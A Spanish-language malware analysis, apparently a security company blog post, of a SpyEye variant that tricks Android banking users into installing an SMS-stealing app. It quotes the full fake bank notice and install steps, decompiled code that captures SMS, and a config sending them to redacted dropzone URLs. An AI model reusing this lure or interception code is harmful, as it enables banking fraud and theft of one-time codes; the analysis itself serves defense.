El 2 de septiembre, el equipo de S21sec ecrime detectó una muestra de Spyeye usando activamente un esquema de fraude tipo MitMo contra Smartphones con sistema operativo Android.

El binario no presenta ninguna mejora destacable, es en la inyección empleada para inducir a la víctima a instalar la aplicación maliciosa en su móvil donde reside la novedad:

Código:
 
En relación a los casos masivos de clonación de tarjetas celulares y el robo de dinero de las cuentas de nuestros clientes, estamos obligados a notificar sobre esto a todos los clientes y protegerlos.
 
Para luchar contra esto, hemos desarrollado una aplicación que protege su teléfono de la intercepción de SMS, que garantiza por completo la seguridad de su teléfono móvil. La aplicación funciona solo en telefonos moviles que trabajan con la plataforma Android. Los poseedores de tales teléfonos desde ahora pueden establecer la aplicación y sin problema usar su cuenta a través del Internet banking. Los usuarios que no poseen teléfonos móviles que trabajen en la plataforma Android, serán obligados a comprarlo para usar sin problema su cuenta y estar protegidos ante los estafadores. Hasta entonces, mientras la aplicación no sea activada en su telefono móvil, no podrá usar la cuenta a través del Internet banking.
 
Es inconveniente, pero es la unica manera que permitirá conservar su dinero en seguridad. Comprendemos que no todos tienen teléfonos a base de Android, pero sólo esta plataforma es capaz de proporcionar la seguridad ante este tipo de estafas. Tan pronto compre el teléfono que trabaje en la plataforma Android, entre nuevamente a su internet banking para descargar y activar la aplicación a su teléfono. Después de esto el acceso a la cuenta a través del Internet será desbloqueado por completo y podrá usarlo.
 
Nota:
 
- ¡Importante! El número telefónico atado a su cuenta, actual para SMS y las firmas, debe usarse en su teléfono Android móvil. Es necesario poner la tarjeta de su teléfono móvil al teléfono que trabaja en Android.
 
- Teléfonos a base de Android se venden en todos los puntos de venta de teléfonos móviles de su país. En cualquier modelo servirá.
 
Si tiene teléfono móvil a base a Android o lo ha adquirido ya, pedimos pasar el proceso obligatorio de la instalación de la aplicación a su teléfono móvil.
 
Nos preocupamos por su seguridad.
 
Atentamente.
 
Establecer la aplicacion
 
Para establecer la aplicación y la seguridad del uso de Internet banking,
 
Tendrás que abrir el navegador de su teléfono móvil en la plataforma Android.
 
Para la instalación de la aplicación es necesario conectarse a Internet, si no sabes como ajustar el Internet en su teléfono , por favor dirija se a su operador de telefonía celular.
 
1. En la línea de domicilios del navegador indiquen la referencia para bajar la aplicación www.##########dad.com/simseg.apk
 
2. Después de bajar la duplicación En la esquina izquierda superior debe aparecer la aguja que indica hacia abajo.
 
3. Abran los Avisos, habiendo estirado el menú de arriba abajo, y pongan en marcha la aplicación.
 
4. Habiendo puesto en marcha la aplicación presionen Install. Esta listo. ¡La aplicación es un éxito establecida en su teléfono móvil!
 
5. Ahora a Usted le queda pasar la autorización del teléfono en el sistema de seguridad del banco.
 
Marquen el número 325000 y presionen llamar. En la pantalla del teléfono debe aparecer un código de seis dígitos.
 
Introduzcan los digitos en el campo de abajo y acaben el proceso de la activación de la aplicación.
 
El código generado:
Cómo se puede apreciar, esta vez se incita a visitar directamente un enlace desde el teléfono de la víctima para luego solicitar un número de 6 cifras mostrado por la aplicación maliciosa, para simular asociar dicho teléfono a la cuenta bancaria, pero en realidad es un número falso que aparece insertado directamente en el código.

Código:
 
if (!paramIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL"))
return;
if (!paramIntent.getStringExtra("android.intent.extra.PHONE_NUMBER").equals("325000"))
return;
Toast.makeText(paramContext, "251340", 0).show();
Aunque posteriormente, en la comunicación con la dropzone, se envía el número MSISDN del teléfono. Realmente no se llega a asociar la infección del dispositivo móvil con la del PC de la víctima.

El funcionamiento de la aplicación maliciosa reside principalmente en capturar todos los SMS entrantes y salientes para enviárselos posteriormente al atacante. De tal forma que la víctima deja de recibir dichos mensajes, los cuales son reenviados directamente al defraudador y, dado que no existe asociación con la infección previa en el PC y/o cuenta de la víctima, es de suponer que simplemente se usarían las credenciales obtenidas previamente a través del troyano, para realizar una transferencia fraudulenta y recibir el token móvil que en ese momento le reenviaría el dispositivo de la víctima.

Los permisos que solicita el fichero Manifest a la hora de instalar la aplicación son los siguientes:


La aplicación, se instala como System y no es visible junto con las demás aplicaciones y, aunque visible desde la lista de las mismas, no sería fácil de detectar por el icono empleado y lo críptico del nombre:


Dispone de un fichero de configuración llamado settings.xml como el que se muestra a continuación:

Código:
 
<?xml version="1.0" encoding="UTF-8"?>
<settings>
<send value="1"/>
<telephone value="123"/>
<http>
<addr value="http://######af.com/sms/gate.php"/>
<addr value="http://######2.com/sms/gate.php"/>
<addr value="http://######fsaf.com/sms/gate.php"/>
<addr value="http://######fsaffa.com/sms/gate.php"/>
</http>
<tels>
</tels>
</settings>
  • send: este valor indica si se enviará la información mediante el envío a una dropzone, envío de mensaje o ambos (por defecto está configurado para enviar por HTTP GET)
  • telephone: El número de teléfono de destino (por defecto uno ficticio)
  • http: Direcciones donde enviar los resultados.
Además, para el envío por HTTP se prepara una cadena y se envía a las dropzones con el siguiente formato:

  • dropzone/gate.php?sender=&receiver=&text=.
Código:
str1 = ((TelephonyManager)paramContext.getSystemService("phone")).getLine1Number(); 
str2 = arrayOfSmsMessage[0].getDisplayOriginatingAddress();
str3 = arrayOfSmsMessage[0].getMessageBody();
if (this.numbers.size() != 0)
continue;
performAction(str2, str1, str3);


Una vez enviado, la aplicación recibe la respuesta de los servidores pero no las procesa, así que no se cree que las dropzones se comuniquen con la aplicación.

Finalmente, el envío de SMS desde el teléfono de la víctima lo haría siguiendo el siguiente formato: sms_dir_origen : sms_body

Desde S21sec ya se han tomado las medidas oportunas para el cierre del sitio malicioso.

Ismael García & Santiago Vicente
S21sec e-crime
http://blog.s21sec.com/2011/09/spyeye-se-apunta-al-man-in-mobile.html